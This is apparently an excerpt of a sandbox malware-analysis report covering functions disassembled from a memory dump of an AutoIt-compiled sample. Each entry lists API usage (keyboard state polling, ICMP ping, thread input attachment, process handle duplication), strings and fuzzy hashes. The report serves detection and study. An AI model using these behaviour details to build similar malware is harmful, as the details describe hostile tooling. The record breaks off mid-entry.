                                                                                • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                • Instruction ID: 0483d2efb24c37e359e91e428a92c2350524f392539da65999ab9045c240fb0d
                                                                                • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                • Instruction Fuzzy Hash: 1041A0226186C385E770AB31A800AFDA3A0FF957A8F940135DA0D47AA8DF7CD656D750
                                                                                Function 00007FF79F8E7BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                • Instruction ID: 587f5663d7e42abc52de1f480c2dd1378ab11e8ddd01941dc75ce6efa7966ee6
                                                                                • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                • Instruction Fuzzy Hash: 2241D622E0C6C556FBB1BB74A808BFDAA94EB11B40F884139C7A9471C5DE1DA8A49371
                                                                                Function 00007FF79F87E774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F876838: CreateFileW.KERNELBASE ref: 00007FF79F8768A2
                                                                                  • Part of subcall function 00007FF79F894380: GetCurrentDirectoryW.KERNEL32(?,00007FF79F87E817), ref: 00007FF79F89439C
                                                                                  • Part of subcall function 00007FF79F8756D4: GetFullPathNameW.KERNEL32(?,00007FF79F8756C1,?,00007FF79F877A0C,?,?,?,00007FF79F87109E), ref: 00007FF79F8756FF
                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79F87E8B0
                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79F87E9FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2207129308-1018226102
                                                                                • Opcode ID: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                                • Instruction ID: 42b950735aa3fd73f4a79f5c36e96ed2d3e8142bba164aec5457ba04a646ad28
                                                                                • Opcode Fuzzy Hash: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                                • Instruction Fuzzy Hash: 5B12A022A186C295EBA0FB31D450AEDE360FB94794FC00132EA4D47BA9DF7CE595D720
                                                                                Function 00007FF79F9066B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                • Instruction ID: 23c0a281c43f6deaee6ee2678c367f2d79f352d622d94947c2ca6a8d8455d9e4
                                                                                • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                • Instruction Fuzzy Hash: 49716022A08B8685EB24AF36D4505FDA7B0FF44BA8F985431DE0E87769DF38E445C360
                                                                                Function 00007FF79F902A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                • String ID: 5$Ping
                                                                                • API String ID: 1486594354-1972892582
                                                                                • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                                • Instruction ID: 82c26d1d08e491728c56a69c76950ee76c99a84f1ac6599eacb044511e02b694
                                                                                • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                                • Instruction Fuzzy Hash: 00718D62A086C286EB70EB36D4803FDA7A0FF84BA4F958431DA5D87795CF7CD4919720
                                                                                Function 00007FF79F8AD504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                • API String ID: 3215553584-2617248754
                                                                                • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                • Instruction ID: b18b82dcb219fb8d72be5ee90be9a779abe12e1bf1b873e1cc685920520ea087
                                                                                • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                • Instruction Fuzzy Hash: 2F41AD76A06B8589F760EF35E851BED73A4EB08398F814136EE5C47B98DE38D025C350
                                                                                Function 00007FF79F8E76D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleStringwprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 4007322891-4153970271
                                                                                • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                • Instruction ID: 9d7906929df60bf6f6d4a2e1624d182bd133690c67c82d30b7a4ec90edd41548
                                                                                • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                • Instruction Fuzzy Hash: 7531B332A18AC291EB60FB31E844AEDA360FB94B94FC04032EA5D43799DF3CE555D760
                                                                                Function 00007FF79F8DE08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 2573188126-1403004172
                                                                                • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                • Instruction ID: 5e811468d3f25ee73eb4f7faf78d3dd1a9936a754a416dfc4d77126fca2c64e6
                                                                                • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                • Instruction Fuzzy Hash: 1531B431A08AC191EA60BB21E8141F8A361FF99BF0F844231DAAD477D9CE2CD559C760
                                                                                Function 00007FF79F8ECA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2479661705-3771769585
                                                                                • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                                • Instruction ID: e0e8c2de1cba249ef3be59e516c91c449055cdd6fde8623e34a9d38d2ebcbbc4
                                                                                • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                                • Instruction Fuzzy Hash: 78219062B089C285EA70BB31E8447FDA320EF85B94FC04135D94E47AA9DF2CE558D720
                                                                                Function 00007FF79F920D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                • String ID:
                                                                                • API String ID: 2672075419-0
                                                                                • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                                • Instruction ID: ebeca136616584d3246da3828b3f14f781298de0f63abeefc6dd9dfec02c2c2c
                                                                                • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                                • Instruction Fuzzy Hash: AC918136B096828AEB70EF7198847FDA3A1BB44BA8F914035DD0D8769DCE38E4558720
                                                                                Function 00007FF79F8E92E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                • Instruction ID: 338da1649a75de8c05a0e51bed0888a6db0a0840f637661acd0447d5ada91ddb
                                                                                • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                • Instruction Fuzzy Hash: 1A317735F0CA8286EB70FB35A844AB9F3A1AB54760F905534CD0EC7758EE7DE4499B20
                                                                                Function 00007FF79F8DE908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 685491774-0
                                                                                • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                • Instruction ID: b9f103daa9a0000b74711085aaec79db6fad4281418eb5b64fb7b7e37c53490c
                                                                                • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                • Instruction Fuzzy Hash: 31118135B0858242E7646B76AC585F96361AFCCBA0FC19439C90A8BB54DE3DD4588360
                                                                                Function 00007FF79F8DF7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                • API String ID: 0-1603158881
                                                                                • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                • Instruction ID: eab667400471071a4146b61c9a98f818f4b7bc72f6a8a031707d8f5f8ff02dd2
                                                                                • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                • Instruction Fuzzy Hash: 8F12C662B296D351EAF8BB31C815AF9E290BF54794FC44532CA1D86294EF3CE564F320
                                                                                Function 00007FF79F90767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Init$Clear
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                • API String ID: 3467423407-1765764032
                                                                                • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                • Instruction ID: fc995fe08a5f7b95085921890549103c05eb82b0c4e010f9f896bcec67754446
                                                                                • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                • Instruction Fuzzy Hash: ABA19F36A08B8286EB20AF75E4405EDA7B0FB84BA8F884132DE5D87758DF3CD545C751
                                                                                Function 00007FF79F907054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                • String ID:
                                                                                • API String ID: 1903627254-0
                                                                                • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                • Instruction ID: a3021e36845c284c27aa88142d04cd38c94a75f24951e68865433cf3c1ebde90
                                                                                • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                • Instruction Fuzzy Hash: 0A025E22A18A8286DB60EF39D4441FDA770FB84BA4F944132EB5E87B68DF3CD549C711
                                                                                Function 00007FF79F8DD780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                • Instruction ID: da6af4879a2050807a48d85c2716b6656dfe3c91bcff5f546be84b7a61a18d0c
                                                                                • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                • Instruction Fuzzy Hash: BF213C72919B8182E720EF62E8483A9B7A0F789FEAF454125DA8D17B58CF7CD1488710
                                                                                Function 00007FF79F920B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                • API String ID: 3721556410-2107944366
                                                                                • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                • Instruction ID: 0b3dd1e1a9f302456227e5ef6ae786134dadaaf7731dd05f77699ce5dfb960b4
                                                                                • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                • Instruction Fuzzy Hash: 11617D22A14A9289EB60EF71D8805EDB760FB44BA8F910132DD1D97BA9CF38E449C350
                                                                                Function 00007FF79F8EA070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
